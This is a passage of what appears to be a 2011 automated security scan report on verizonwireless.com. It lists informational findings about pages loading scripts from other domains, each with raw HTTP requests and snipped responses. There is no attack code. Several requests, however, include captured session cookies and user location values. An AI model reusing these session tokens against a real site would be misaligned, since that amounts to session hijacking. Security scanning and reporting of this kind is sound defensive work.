       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</form>


           <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...

16.65. http://www.verizonwireless.com/b2c/employee/emaildomainauthentication.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/employee/emaildomainauthentication.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/employee/emaildomainauthentication.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:01 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                <html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.66. http://www.verizonwireless.com/b2c/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/explore/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/explore/ HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:05 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 18778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/splashPageDB.js"></script>    
   <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/db.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.67. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/index.html?tab=business HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/homeLogin.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.68. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:14:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 32478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</noscript>
   

       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

16.69. http://www.verizonwireless.com/b2c/promo/splash/ewp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/promo/splash/ewp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/promo/splash/ewp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="e
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
<!-- End BlueKai Tag -->
   
   
   <script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...

16.70. http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/promotion/specialoffers.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/promotion/specialoffers.jsp HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: GLOBALID=tWRJzfV%2FzyamDVoURNGmO7smtgitROzrsjFa48jF8jyYMlJxx5Bllp8fvpJxcQO4; JSESSIONIDB2C=j6fhTlJFv6JCWtlSlB7JQG28QLChh2W1b7QTf9cVB51pQnFmLBtG!-1538644045!ozzy!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6575345525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315278932|session#1315278871714-190238#1315280732|PC#1315278871714-190238.19#1316488474; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:14:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 18728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="e
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.71. http://www.verizonwireless.com/b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY; mbox=session#1315278939788-568601#1315281120|PC#1315278939788-568601.19#1316488860|check#true#1315279320; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:36:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 15971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.72. http://www.verizonwireless.com/b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY; mbox=session#1315278939788-568601#1315281120|PC#1315278939788-568601.19#1316488860|check#true#1315279320; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 15971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>


<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.73. http://www.verizonwireless.com/b2c/store/accessory

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/accessory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

